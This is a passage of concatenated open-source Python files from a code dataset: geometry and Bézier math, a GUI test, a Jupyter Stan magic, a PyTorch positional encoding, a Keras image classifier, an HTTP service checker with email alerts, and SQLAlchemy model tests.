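print(sq(0, 5))  # 3**2 + 4**2 + 5**2 = 50: same points integrated, two fewer terms summed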
Valid types are 'nma', 'prowl', and 'pushover'\n# for Notify My Android, Prowl, and Pushover clients, respectively.\n# Set to 'email' if email notifications should be used\nNOTIFY_SERVICE = \"nma\"\n# API key for that service\nNOTIFY_APIKEY = \"\"\n# Email notifications\n# SMTP server\nSMTP_SERVER = \"smtp.gmail.com\"\n# SMTP port 587 is default with TLS\nSMTP_PORT = 587\n# SMTP username\nSMTP_USERNAME = \"\"\n# SMTP password (Google: app-specific passwords work)\nSMTP_PASSWORD = \"\"\n# Sender's email address\nEMAIL_FROM = \"\"\n# Recipient's email address\nEMAIL_TO = \"\"\n","sub_path":"config_sample.py","file_name":"config_sample.py","file_ext":"py","file_size_in_byte":1505,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"}{"seq_id":"472642298","text":"import torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nfrom torch.autograd import Variable  # needed by crop_and_warp below\n\nfrom .utils import create_meshgrid\nfrom .conversions import transform_points\n\n\n__all__ = [\n    \"HomographyWarper\",\n    \"homography_warp\",\n]\n\n\n# layer api\n\nclass HomographyWarper(nn.Module):\n    \"\"\"Warps patches by homographies.\n\n    .. math::\n\n        X_{dst} = H_{dst}^{src} * X_{src}\n\n    Args:\n        width (int): The width of the image to warp.\n        height (int): The height of the image to warp.\n        points (Tensor): Tensor[3, N] of homogeneous points in normalized image\n                         space [-1, 1] to sample. Optional parameter.\n    \"\"\"\n\n    def __init__(self, height, width, points=None):\n        super(HomographyWarper, self).__init__()\n        if points is not None:\n            assert points.size(0) == 3, \"Points must be 3xN\"\n            self.width = points.size(1)\n            self.height = 1\n            self.grid = points\n        else:\n            self.width = width\n            self.height = height\n            # create base grid to use for computing the flow\n            self.grid = create_meshgrid(\n                height, width, normalized_coordinates=True)\n\n    def warp_grid(self, H):\n        \"\"\"\n        :param H: Homography or homographies (stacked) to transform all points\n                  in the grid.\n        :returns: Tensor[1, Height, Width, 2] containing transformed points in\n                  normalized images space.\n        \"\"\"\n        batch_size = H.shape[0]  # expand grid to match the input batch size\n        grid = self.grid.repeat(batch_size, 1, 1, 1)  # NxHxWx2\n        if len(H.shape) == 3:  # local homography case\n            H = H.view(batch_size, 1, 3, 3)  # NxHxWx3x3\n        # perform the actual grid transformation,\n        # the grid is copied to input device and casted to the same type\n        flow = transform_points(H, grid.to(H.device).type_as(H))  # NxHxWx2\n        return flow.view(batch_size, self.height, self.width, 2)  # NxHxWx2\n\n    def random_warp(self, patch, dist):\n        # NB: relies on a random_homography(dist) helper defined elsewhere.\n        return self(patch, random_homography(dist))\n\n    def crop_and_warp(self, H, image, roi, padding_mode='zeros'):\n        grid = self.warp_grid(H)\n        assert len(image.shape) == 4, image.shape\n\n        width, height = image.shape[3], image.shape[2]\n\n        start_x, end_x = roi[2], roi[3] - 1  # inclusive [x_0, x_1]\n        start_y, end_y = roi[0], roi[1] - 1\n\n        start_x = (2 * start_x) / width - 1\n        end_x = (2 * end_x) / width - 1\n\n        start_y = (2 * start_y) / height - 1\n        end_y = (2 * end_y) / height - 1\n\n        b_x = (start_x + end_x) / 2\n        a_x = b_x - start_x\n\n        b_y = (start_y + end_y) / 2\n        a_y = b_y - start_y\n        a = Variable(torch.FloatTensor((a_x, a_y)))\n        b = Variable(torch.FloatTensor((b_x, b_y)))\n        if grid.is_cuda:\n            a = a.cuda()\n            b = b.cuda()\n        grid = grid * a + b\n        return F.grid_sample(\n            image, grid, mode='bilinear', padding_mode=padding_mode)\n\n    def forward(self, patch, dst_homo_src, padding_mode='zeros'):\n        \"\"\"Warps an image or tensor from source into reference frame.\n\n        Args:\n            
patch (Tensor): The image or tensor to warp. Should be from source.\n            dst_homo_src (Tensor): The homography or stack of homographies\n                                   from source to destination.\n            padding_mode (string): Either 'zeros' to replace out of bounds with\n                                   zeros or 'border' to choose the closest\n                                   border data.\n\n        Return:\n            Tensor: Patch sampled at locations from source to destination.\n\n        Shape:\n            - Input: :math:`(N, C, H, W)` and :math:`(N, 3, 3)`\n            - Output: :math:`(N, C, H, W)`\n\n        Example:\n            >>> input = torch.rand(1, 3, 32, 32)\n            >>> homography = torch.eye(3).view(1, 3, 3)\n            >>> warper = tgm.HomographyWarper(32, 32)\n            >>> output = warper(input, homography)  # NxCxHxW\n        \"\"\"\n        if not dst_homo_src.device == patch.device:\n            raise TypeError(\"Patch and homography must be on the same device. \\\n                            Got patch.device: {} dst_homo_src.device: {}.\"\n                            .format(patch.device, dst_homo_src.device))\n        return torch.nn.functional.grid_sample(\n            patch, self.warp_grid(dst_homo_src), mode='bilinear',\n            padding_mode=padding_mode)\n\n# functional api\n\n\ndef homography_warp(patch, dst_H_src, dsize, points=None,\n                    padding_mode='zeros'):\n    \"\"\"\n    .. note:: Functional API for :class:`torchgeometry.HomographyWarper`\n\n    Warps patches by homographies.\n\n    Args:\n        patch (Tensor): The image or tensor to warp. Should be from source.\n        dst_H_src (Tensor): The homography or stack of homographies from\n                            source to destination.\n        dsize (tuple): The height and width of the image to warp.\n        points (Tensor): Tensor[3, N] of homogeneous points in normalized image\n                         space [-1, 1] to sample. Optional parameter.\n        padding_mode (string): Either 'zeros' to replace out of bounds with\n                               zeros or 'border' to choose the closest border\n                               data.\n\n    Return:\n        Tensor: Patch sampled at locations from source to destination.\n\n    Shape:\n        - Input: :math:`(N, C, H, W)` and :math:`(N, 3, 3)`\n        - Output: :math:`(N, C, H, W)`\n\n    Example:\n        >>> input = torch.rand(1, 3, 32, 32)\n        >>> homography = torch.eye(3).view(1, 3, 3)\n        >>> output = tgm.homography_warp(input, homography, (32, 32))  # NxCxHxW\n    \"\"\"\n    height, width = dsize\n    warper = HomographyWarper(height, width, points)\n    return warper(patch, dst_H_src, padding_mode)\n","sub_path":"torchgeometry/homography_warper.py","file_name":"homography_warper.py","file_ext":"py","file_size_in_byte":5851,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"}{"seq_id":"611311106","text":"# Purpose: Bezier Curve optimized for 4 control points\n# Created: 26.03.2010\n# Copyright (c) 2010-2020 Manfred Moitzi\n# License: MIT License\nfrom typing import List, TYPE_CHECKING, Iterable, Union\nimport math\nfrom ezdxf.math import Vector, Vec2\n\nif TYPE_CHECKING:\n    from ezdxf.eztypes import Vertex\n\n\ndef check_if_in_valid_range(t: float):\n    if not (0 <= t <= 1.):\n        raise ValueError(\"t not in range [0 to 1]\")\n\n\nclass Bezier4P:\n    \"\"\"\n    Implements an optimized cubic `Bézier curve`_ for exactly 4 control points. 
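A note on the ROI arithmetic in `crop_and_warp` above: it maps inclusive pixel coordinates into `grid_sample`'s normalized [-1, 1] space via x_norm = 2*x/size - 1, then squeezes the base grid into that window with `grid * a + b`. A stand-alone numeric check of that affine squeeze (the ROI values below are arbitrary):

def to_norm(x, size):
    # grid_sample convention assumed by crop_and_warp: pixel x -> [-1, 1]
    return (2 * x) / size - 1

width = 32
start_x, end_x = 8, 24 - 1   # inclusive [x_0, x_1], as in crop_and_warp
b_x = (to_norm(start_x, width) + to_norm(end_x, width)) / 2  # window center
a_x = b_x - to_norm(start_x, width)                          # half-extent
print(a_x, b_x)  # 0.46875 -0.03125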
A `Bézier curve`_ is a parametric\n    curve, parameter `t` goes from ``0`` to ``1``, where ``0`` is the first control point and ``1`` is the\n    fourth control point.\n\n    Special behavior:\n\n        - 2D control points in, returns 2D results as :class:`~ezdxf.math.Vec2` objects\n        - 3D control points in, returns 3D results as :class:`~ezdxf.math.Vector` objects\n\n    Args:\n        defpoints: iterable of definition points as :class:`Vec2` or :class:`Vector` compatible objects.\n\n    \"\"\"\n\n    def __init__(self, defpoints: List['Vertex']):\n        if len(defpoints) == 4:\n            is3d = any(len(p) > 2 for p in defpoints)\n            vector_class = Vector if is3d else Vec2\n            self._control_points = vector_class.list(defpoints)\n        else:\n            raise ValueError(\"Four control points required.\")\n\n    @property\n    def control_points(self) -> List[Union[Vector, Vec2]]:\n        \"\"\" control points as list of ``(x, y, z)``, z-axis is ``0`` for 2D curves. \"\"\"\n        return self._control_points\n\n    def tangent(self, t: float) -> Union[Vector, Vec2]:\n        \"\"\"\n        Returns direction vector of tangent for location `t` at the `Bézier curve`_.\n\n        Args:\n            t: curve position in the range ``[0, 1]``\n\n        \"\"\"\n        check_if_in_valid_range(t)\n        return self._get_curve_tangent(t)\n\n    def point(self, t: float) -> Union[Vector, Vec2]:\n        \"\"\"\n        Returns point for location `t` at the `Bézier curve`_.\n\n        Args:\n            t: curve position in the range ``[0, 1]``\n\n        \"\"\"\n        check_if_in_valid_range(t)\n        return self._get_curve_point(t)\n\n    def approximate(self, segments: int) -> Iterable[Union[Vector, Vec2]]:\n        \"\"\"\n        Approximate `Bézier curve`_ by vertices, yields `segments` + 1 vertices as ``(x, y[, z])`` tuples.\n\n        Args:\n            segments: count of segments for approximation\n\n        \"\"\"\n        delta_t = 1. / segments\n        yield self._control_points[0]\n        for segment in range(1, segments):\n            yield self.point(delta_t * segment)\n        yield self._control_points[3]\n\n    def _get_curve_point(self, t: float) -> Union[Vector, Vec2]:\n        b1, b2, b3, b4 = self._control_points\n        one_minus_t = 1. - t\n        return b1 * (one_minus_t ** 3) + (b2 * (3. * one_minus_t ** 2 * t)) + (b3 * (3. * one_minus_t * t ** 2)) + (\n            b4 * (t ** 3))\n\n    def _get_curve_tangent(self, t: float) -> Union[Vector, Vec2]:\n        b1, b2, b3, b4 = self._control_points\n        return b1 * (-3. * (1. - t) ** 2) + (b2 * (3. * (1. - 4. * t + 3. * t ** 2))) + (\n            b3 * (3. * t * (2. - 3. * t))) + (b4 * (3. * t ** 2))\n\n    def approximated_length(self, segments: int = 100) -> float:\n        \"\"\" Returns estimated length of `Bézier curve`_ as approximation by line `segments`. \"\"\"\n        length = 0.\n        prev_point = None\n        for point in self.approximate(segments):\n            if prev_point is not None:\n                length += prev_point.distance(point)\n            prev_point = point\n        return length\n\n\ndef cubic_bezier_arc_parameters(start_angle: float, end_angle: float, segments: int = 1):\n    \"\"\"\n    Yields cubic Bezier curve parameters for a circular 2D arc with center at (0, 0) and a radius of 1\n    in the form of [start point, 1. control point, 2. 
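Assuming `ezdxf` is installed, the `Bezier4P` class above can be exercised directly; the midpoint value below follows by hand from the Bernstein form in `_get_curve_point` (at t = 0.5 the four weights are 1/8, 3/8, 3/8, 1/8):

curve = Bezier4P([(0, 0), (1, 0), (1, 1), (2, 1)])  # 2D input -> Vec2 results
mid = curve.point(0.5)
# B(0.5) = (b1 + 3*b2 + 3*b3 + b4) / 8 = ((0,0) + (3,0) + (3,3) + (2,1)) / 8
print(mid.x, mid.y)                    # 1.0 0.5
print(curve.approximated_length(200))  # polyline estimate over 200 segments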
control point, end point].\n\n    Args:\n        start_angle: start angle in radians\n        end_angle: end angle in radians (end_angle > start_angle!)\n        segments: count of segments, at least one segment for each quarter (pi/2)\n\n    \"\"\"\n    # Source: https://stackoverflow.com/questions/1734745/how-to-create-circle-with-b%C3%A9zier-curves\n    if segments < 1:\n        raise ValueError('Invalid argument segments (>= 1).')\n    delta_angle = end_angle - start_angle\n    if delta_angle > 0:\n        arc_count = max(math.ceil(delta_angle / math.pi * 2.0), segments)\n    else:\n        raise ValueError('Delta angle from start- to end angle has to be > 0.')\n\n    segment_angle = delta_angle / arc_count\n    tangent_length = 4.0 / 3.0 * math.tan(segment_angle / 4.0)\n\n    angle = start_angle\n    end_point = None\n    for _ in range(arc_count):\n        start_point = Vector.from_angle(angle) if end_point is None else end_point\n        angle += segment_angle\n        end_point = Vector.from_angle(angle)\n        control_point_1 = start_point + (-start_point.y * tangent_length, start_point.x * tangent_length)\n        control_point_2 = end_point + (end_point.y * tangent_length, -end_point.x * tangent_length)\n        yield start_point, control_point_1, control_point_2, end_point\n","sub_path":"src/ezdxf/math/bezier4p.py","file_name":"bezier4p.py","file_ext":"py","file_size_in_byte":5134,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"}{"seq_id":"210946601","text":"source(findFile(\"scripts\", \"utilities.py\"))\n\ndef main():\n    startOrAttachToDAWN()\n    setupEPDPython()\n    \n    activateItem(waitForObjectItem(\":_Menu\", \"Window\"))\n    activateItem(waitForObjectItem(\":Window_Menu\", \"Preferences\"))\n    expand(waitForObjectItem(\":Preferences_Tree\", \"PyDev\"))\n    mouseClick(waitForObjectItem(\":Preferences_Tree\", \"Interactive Console\"))\n    connectDebug = waitForObject(\":Preferences.Connect console to Variables Debug View?_Button\")\n    if not connectDebug.getSelection():\n        clickButton(connectDebug)\n    clickButton(waitForObject(\":Preferences.OK_Button\"))\n\n    openPerspective(\"Debug\")\n    openPyDevConsole()\n    \n    # XXX Dropping in Squish seems to require the horizontal scroll bar to be enabled, do this by printing a long line\n    # Squish provided a patched version that resolves this issue, but it doesn't appear to work on all platforms (e.g. win64)\n    # It is expected a full fix will be available in Squish 4.3\n    mouseClick(waitForObject(\":Clear Console_ToolItem\"))\n    type(waitForObject(\":PyDev Console\"), \"print 'X' * 1000\")\n    type(waitForObject(\":PyDev Console\"), \"<Return>\")\n    snooze(5)\n    type(waitForObject(\":PyDev Console\"), \"myvar='Kichwa Was Here'\")\n    type(waitForObject(\":PyDev Console\"), \"<Return>\")\n    mouseClick(waitForObjectItem(\":Variables_Tree\", \"myvar\"))\n    dragAndDrop(waitForObjectItem(\":Variables_Tree\", \"myvar\"), 5, 5, \":PyDev Console\", 5, 5, DnD.DropCopy)\n    mouseClick(waitForObject(\":PyDev Console\"))\n    type(waitForObject(\":PyDev Console\"), \"\")\n    type(waitForObject(\":PyDev Console\"), \"\")\n    type(waitForObject(\":PyDev Console\"), \"print \")\n\n    type(waitForObject(\":PyDev Console\"), \"<Return>\")\n    # We need to wait a moment while the python executes the print above\n    # We don't (yet?) 
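The `tangent_length = 4.0 / 3.0 * math.tan(segment_angle / 4.0)` line above is the standard control-point offset for approximating a circular arc with a cubic Bézier; for a quarter circle it reproduces the familiar "circle constant":

import math

theta = math.pi / 2                       # one quarter circle
print(4.0 / 3.0 * math.tan(theta / 4.0))  # 0.5522847498... (the usual Bézier circle constant)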
have a good way to synchronize on this event \n # (Note, it may be best to waitFor() the text ending with '>>> ' which implies that\n # python is done and new commands can be entered)\n snooze(10)\n expected = \"\\nKichwa Was Here\\n>>> \"\n got = waitForObject(\":PyDev Console\", 15000).text\n if got.endswith(expected):\n test.verify(True, \"Variable dropped successfully and printed expected value\")\n else:\n \ttest.fail(\"Console had unexpected text, Expected endswith '%s', got '%s'\" % (expected, got))\n\n closeOrDetachFromDAWN()\n\n","sub_path":"org.dawnsci.squishtests/suite_epd_general/tst_console_drag_drop/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":2359,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"361126232","text":"from tkinter import *\r\nimport sys\r\nRoot=Tk()\r\nRTitle=Root.title(\"Windows\")\r\nRWidth=Root.winfo_screenwidth()\r\nRHeight=Root.winfo_screenheight()\r\nRoot.geometry((\"%dx%d\")%(RWidth,RHeight))\r\nclass StatusBar(Frame):\r\n def __init__(self, master):\r\n Frame.__init__(self, master)\r\n self.label = Label(self, bd=1, relief=SUNKEN, anchor=W)\r\n self.label.pack(fill=X)\r\n def set(self, format, *args):\r\n self.label.config(text=format % args)\r\n self.label.update_idletasks()\r\n def clear(self):\r\n self.label.config(text=\"\")\r\n self.label.update_idletasks()\r\nstatus=StatusBar(Root)\r\nstatus.pack(side=BOTTOM, fill=X)\r\nRoot.mainloop()\r\n\r\n","sub_path":"Graphique Tkinter/pleinEcran.py","file_name":"pleinEcran.py","file_ext":"py","file_size_in_byte":676,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"67517006","text":"import datetime\nimport humanize\nfrom typing import Tuple, Dict\n\nimport argparse\n\nfrom IPython.core.magic import Magics, cell_magic, magics_class\n\nfrom IPython.utils.capture import capture_output\n\nimport pystan\n\n\ndef parse_args(argstring: str) -> Tuple[str, Dict]:\n # users can separate arguments with commas and/or whitespace\n parser = argparse.ArgumentParser(description=\"Process pystan arguments.\")\n parser.add_argument(\"variable_name\", nargs=\"?\", default=\"_stan_model\")\n parser.add_argument(\"--model_name\")\n parser.add_argument(\"--include_paths\", nargs=\"*\")\n parser.add_argument(\"--boost_lib\")\n parser.add_argument(\"--eigen_lib\")\n parser.add_argument(\"--verbose\", \"-v\", action=\"store_true\")\n parser.add_argument(\"--obfuscate_model_name\", action=\"store_false\")\n kwargs = vars(parser.parse_args(argstring.split()))\n\n variable_name = kwargs.pop(\"variable_name\")\n\n if not variable_name.isidentifier():\n raise ValueError(\n f\"The variable name {variable_name} is \"\n f\"not a valid python variable name.\"\n )\n\n # set defaults:\n if kwargs[\"model_name\"] is None:\n kwargs[\"model_name\"] = variable_name\n\n return variable_name, kwargs\n\n\n@magics_class\nclass StanMagics(Magics):\n def __init__(self, shell):\n super(StanMagics, self).__init__(shell)\n\n @cell_magic\n def stan(self, line, cell):\n \"\"\"\n Allow jupyter notebook cells create a pystan.StanModel object from\n Stan code in a cell that begins with %%stan. 
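For example, the cell magic line `%%stan mymodel --verbose` reaches `parse_args` (defined above) as `"mymodel --verbose"`; given the argparse defaults in that function, it resolves as:

variable_name, stan_opts = parse_args("mymodel --verbose")
print(variable_name)  # 'mymodel'
print(stan_opts)
# {'model_name': 'mymodel', 'include_paths': None, 'boost_lib': None,
#  'eigen_lib': None, 'verbose': True, 'obfuscate_model_name': True}
# (model_name falls back to the variable name when not given explicitly)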
The pystan.StanModel\n gets assigned to a variable in the notebook's namespace, either\n named _stan_model (the default), or a custom name (specified\n by writing %%stan ).\n \"\"\"\n\n variable_name, stan_opts = parse_args(line)\n\n print(\n f\"Creating pystan model & assigning it to variable \"\n f'name \"{variable_name}\".'\n )\n print(f\"Stan options:\\n\", stan_opts)\n\n start = datetime.datetime.now()\n try:\n with capture_output(display=False) as capture:\n _stan_model = pystan.StanModel(model_code=cell, **stan_opts)\n except Exception:\n print(f\"Error creating Stan model:\")\n print(capture)\n raise\n end = datetime.datetime.now()\n delta = humanize.naturaldelta(end - start)\n\n self.shell.user_ns[variable_name] = _stan_model\n print(\n f'StanModel now available as variable \"{variable_name}\"!\\n'\n f\"Compilation took {delta}.\"\n )\n\n\ndef load_ipython_extension(ipython):\n ipython.register_magics(StanMagics)\n\n\ndef unload_ipython_extension(ipython):\n # ipython.user_global_ns.pop('_stan_vars', None)\n pass\n","sub_path":"jupyterstan/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":2744,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"601847926","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('newmailing', '0011_onemessage_template_id'),\n ]\n\n operations = [\n migrations.AddField(\n model_name='messageerror',\n name='date_create',\n field=models.DateTimeField(verbose_name='Дата появления', auto_now_add=True, null=True),\n ),\n ]\n","sub_path":"newmailing/migrations/0012_messageerror_date_create.py","file_name":"0012_messageerror_date_create.py","file_ext":"py","file_size_in_byte":481,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"125936365","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n# @Time : Wed Dec 26 11:35:29 2018\n# @Author : JRP - Ruipeng Jia\n\nimport numpy as np\nimport torch\nfrom torch import nn\n\nfrom config import opt\n\n\nclass PositionalEncoding(nn.Module):\n # This class is modified from https://github.com/JayParks/transformer/blob/master/transformer/modules.py.\n\n def __init__(self, args):\n # max_seq_len: The maximum sequence length, or the time-steps, the second dimension of input x with shape of [B, L, D]\n super(PositionalEncoding, self).__init__()\n self.args = args\n max_seq_len = self.args.max_source_length\n\n ## j//2 because we have sin and cos tow channels\n position_encoding = np.array([[pos / np.power(10000, 2.0 * (j // 2) / self.args.hidden_dim) for j in range(self.args.hidden_dim)] for pos in range(max_seq_len)])\n position_encoding[:, 0::2] = np.sin(position_encoding[:, 0::2])\n position_encoding[:, 1::2] = np.cos(position_encoding[:, 1::2])\n position_encoding = torch.Tensor(position_encoding).to(opt.device)\n\n pad_row = torch.zeros([1, self.args.hidden_dim]).to(opt.device)\n position_encoding = torch.cat((pad_row, position_encoding))\n\n ## additional PAD position index\n self.position_encoding = nn.Embedding(max_seq_len + 1, self.args.hidden_dim)\n self.position_encoding.weight = nn.Parameter(position_encoding, requires_grad=False)\n\n def forward(self, input_len):\n # input_len: A tensor with shape (B). 
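The table built in `__init__` above is the standard sinusoidal positional encoding: column pairs share one frequency, with sin written to even columns and cos to odd ones. A scalar re-derivation of a single even-column entry (dimensions chosen arbitrarily):

import numpy as np

d, pos, j = 512, 3, 10                             # hidden dim, position, even column
angle = pos / np.power(10000, 2.0 * (j // 2) / d)  # same exponent as in __init__
print(np.sin(angle))  # value at row `pos` of the raw table (a PAD row is prepended afterwards)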
Each element's value in this tensor is the length of a sequence from a mini batch.\n        max_len = torch.max(input_len)\n        input_pos = torch.LongTensor([list(range(1, length + 1)) + [opt.pad_id] * int(max_len - length) for length in input_len]).to(opt.device)  # start from 1 because 0 is for PAD\n        return self.position_encoding(input_pos)\n","sub_path":"bin/template/src/jptproject/l5_2018_12_Pytorch_Summarization_with_Pointer-Generator_Networks/modules/positional_encoding.py","file_name":"positional_encoding.py","file_ext":"py","file_size_in_byte":1863,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"}{"seq_id":"335387863","text":"import sys\nfrom PIL import Image\nfrom keras.models import load_model\nimport numpy as np\nimport tensorflow.compat.v1 as tf\ntf.disable_v2_behavior()\n\ndef main():\n    name = sys.argv[1]\n    #print(name)\n    image = Image.open(name)\n    image = image.resize((64, 64))\n    image.show()\n    model = load_model(\"model.h5\")\n    np_image = np.array(image)\n    np_image = np_image / 255\n    np_image = np_image[np.newaxis, :, :, :]\n    result = model.predict(np_image)\n    #print(result)\n    if result[0][0] > result[0][1]:\n        print(\"椎茸\")  # shiitake\n    else:\n        print(\"月夜茸\")  # tsukiyotake\n\n\nif __name__ == \"__main__\":\n    main()","sub_path":"classify.py","file_name":"classify.py","file_ext":"py","file_size_in_byte":614,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"}{"seq_id":"572260209","text":"#coding:UTF-8\n__author__ = 'riros@ya.ru'\n\n'''\nMultithreaded availability checker for the api-xml service\n\npip install requests\nor\neasy_install requests\n'''\nfrom requests import get\nimport smtplib\nimport logging\nimport socket\nimport time\nimport multiprocessing\nimport os\n\nclass config:\n    sender = 'riros@ya.ru'\n    smtpserver= \"smtp.ya.ru\"\n    sender_pass = '#######'\n    sender_user =\"riros\"\n    logfile = \"servicechecker.log\"\n    logformat = '%(asctime)s - %(name)s - %(levelname)s - %(message)s'\n    roots = [\"ivanvalenkov@gmail.com\"] # recipients of all system messages\n\n    works = [\n        {\n        \"type\":\"http\",\n        \"receivers\" :[\"ivanvalenkov@gmail.com\"], # could work like a unit test, with dedicated developer recipients for each service\n        \"name\":\"ya_ru\",\n        \"server\":\"ya.ru\",\n        \"url\":r'http://ya.ru',\n        \"response_timeout\":45, #todo\n        \"repeat_delay\":60,\n        \"error_action\":\"logandwait\"\n        },\n        {\n        \"type\":\"http\",\n        \"receivers\" :[\"ivanvalenkov@gmail.com\"], # could work like a unit test, with dedicated developer recipients for each service\n        \"name\":\"api-xml\",\n        \"server\":\"dev.1linegroup.com\",\n        \"url\":r'http://dev.1linegroup.com/api-xml?ping',\n        \"response_timeout\":45, #todo\n        \"repeat_delay\":60,\n        \"error_action\":\"sendmail\"# will send an email on every hiccup\n        },\n        ]\n    \ndef sendmail(work,logger,message):\n    try:\n        obj = smtplib.SMTP(config.smtpserver)\n        obj.login(config.sender_user,config.sender_pass)\n        for recv in work[\"receivers\"]:\n            m = \"Subject: ServiceChecker\\r\\n\\r\\n on %s:%s \\n\\r %s\" %(socket.gethostname(),socket.gethostbyname_ex(socket.gethostname())[2],message)\n            obj.sendmail(config.sender,[recv],m)\n            logger.info(\"email to \" + recv+\" sending Message:\"+message)\n        obj.close()\n    except :\n        logger.error(\"exception in send mail to \" + recv +\" Message:\"+message)\n    return\n\ndef do(work,init = False):\n    EmailSended = False\n    try:\n        logger = logging.getLogger(work[\"name\"])\n        logger.setLevel(logging.DEBUG)\n        if not init:\n            #fh = logging.FileHandler(work[\"name\"]+\".log\")\n            fh = 
logging.FileHandler(\"workers.log\")\n formatter = logging.Formatter(config.logformat)\n fh.setFormatter(formatter)\n logger.addHandler(fh)\n\n\n #logger.setLevel(logging.DEBUG)\n logger.info(\"start\")\n except:\n print (\"Exceptino in logging system. IO Error\")\n sendmail(work,logger,\"Exceptino in logging system. IO Error\")\n return True\n while True:\n if not os.path.exists(\"process\"):\n logger.info(\"stop\")\n return False # нормальное завершение\n\n if work[\"type\"]==\"http\":\n try:\n resp = get(work[\"url\"])\n if resp.status_code == 200:\n logger.debug(\"test OK - \"+\"time to response:\"+str(resp.elapsed))\n if EmailSended and work[\"error_action\"] == \"sendmail\":\n sendmail(work,logger,\"service '%s'\"%work[\"name\"]+\" restored\")\n EmailSended = False\n if init:\n return False\n else:\n logger.error(\"response code:\"+resp.status_code)\n if not EmailSended:\n if work[\"error_action\"] == \"sendmail\":\n sendmail(work,logger,\"response code:\"+resp.status_code)\n EmailSended = True\n if init:\n return True\n resp.close()\n except :\n print (\"Exception in do('%s')\"%work[\"name\"])\n logger.error(\"Exception in do('%s')\"%work[\"name\"])\n if not EmailSended:\n if work[\"error_action\"] == \"sendmail\":\n sendmail(work,logger,\"Exception in do('%s')\"%work[\"name\"])\n EmailSended = True\n if init:\n return True\n\n time.sleep(work[\"repeat_delay\"])\n #break\n\ndef init(rootlog):\n rootlog.info(\"init...\")\n #check smtp service\n rootlog.info(\"check smtp service\")\n try:\n obj = smtplib.SMTP(config.smtpserver)\n obj.login(config.sender_user,config.sender_pass)\n obj.close()\n rootlog.info(\"done\")\n except :\n rootlog.error(\"Except smtp service\")\n print (\"except smtp service\")\n raise\n\n for work in config.works:\n err = do(work,True)\n if err:\n rootlog.error(\"init fail in:\"+work[\"name\"])\n print (\"INIT FAIL!\")\n return False\n rootlog.info(\"init done.\")\n return True\n\ndef main():\n rootlog = logging.getLogger(\"\")\n rootlog.setLevel(logging.DEBUG)\n fh = logging.FileHandler(config.logfile)\n formatter = logging.Formatter(config.logformat)\n fh.setFormatter(formatter)\n rootlog.addHandler(fh)\n rootlog.info(\"================================================================================\")\n rootlog.info(\"start\")\n if init(rootlog):\n rootlog.info(\"sending emails to roots\")\n try:\n obj = smtplib.SMTP(config.smtpserver)\n errcode,smtp_server_message = obj.login(config.sender_user,config.sender_pass)\n for recv in config.roots:\n obj.sendmail(config.sender,[recv],\"Subject: ServiceChecker\\r\\n\\r\\n service started on server %s\"%socket.gethostbyname_ex(socket.gethostname())[2])\n obj.close()\n except:\n rootlog.error(\"sending email message:service started\")\n rootlog.info(\"done\")\n rootlog.info(\"spawn workers...\")\n\n if not os.path.exists(\"process\"):\n f = open(\"process\",'wb')\n f.write(bytes(\"1\",'utf-8'))\n f.close()\n\n print (\"works:\"+str(len(config.works)))\n # а вот тут магия! 
;)\n p = multiprocessing.Pool(len(config.works))\n p.map(do,config.works)\n\n rootlog.info(\"stop\")\n rootlog.info(\"---------------------------------------------------------------------------------------------\")\n print (\"exit\")\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"servicechecker/servicechecker.py","file_name":"servicechecker.py","file_ext":"py","file_size_in_byte":6590,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"301379871","text":"\"\"\"Preference model tests.\"\"\"\n\nimport os\nfrom unittest import TestCase\nfrom sqlalchemy import exc\n\nfrom models import db, User, Preference\n\nos.environ['DATABASE_URL'] = \"postgresql:///statshot_test\"\n\nfrom app import app\n\ndb.create_all()\n\nclass PrefsModelTestCase(TestCase):\n \"\"\"Tests for Preference model\"\"\"\n\n def setUp(self):\n \"\"\"Create test client, add sample data\"\"\"\n db.drop_all()\n db.create_all()\n\n u1 = User.register(\"test1\", \"passwordtest1\")\n uid1 = 1111\n u1.id = uid1\n\n db.session.commit()\n\n p1 = Preference(\n user_id = u1.id,\n fav_team_id = 25\n )\n\n db.session.commit()\n\n self.p1 = p1\n self.client = app.test_client()\n\n def tearDown(self):\n \"\"\"Tear down after each test\"\"\"\n res = super().tearDown()\n db.session.rollback()\n return res\n\n def test_prefs_models(self):\n \"\"\"Test basic preference functionality\"\"\"\n u = User.register(\"testprefs\", \"prefsword\")\n uid = 222\n u.id = uid\n db.session.add(u)\n db.session.commit()\n\n p = Preference(\n user_id = u.id,\n fav_team_id = 2\n )\n \n db.session.add(p)\n db.session.commit()\n\n ptest = Preference.query.get(p.user_id)\n\n self.assertEqual(ptest.fav_team_id, 2)\n\n def test_no_user_id(self):\n \"\"\"Test for None value user id in prefs\"\"\"\n\n u2 = User.register(\"testprefs\", \"prefsword\")\n uid2 = 222\n u2.id = uid2\n db.session.add(u2)\n db.session.commit()\n\n p2 = Preference(\n user_id = None,\n fav_team_id = 2\n )\n\n db.session.add(p2)\n with self.assertRaises(exc.IntegrityError) as context:\n db.session.commit()\n\n def test_invalid_user_id(self):\n \"\"\"Test for invalid user id in prefs\"\"\"\n\n u3 = User.register(\"testprefs\", \"prefsword\")\n uid3 = 333\n u3.id = uid3\n db.session.add(u3)\n db.session.commit()\n\n p3 = Preference(\n user_id = 99999,\n fav_team_id = 2\n )\n\n db.session.add(p3)\n with 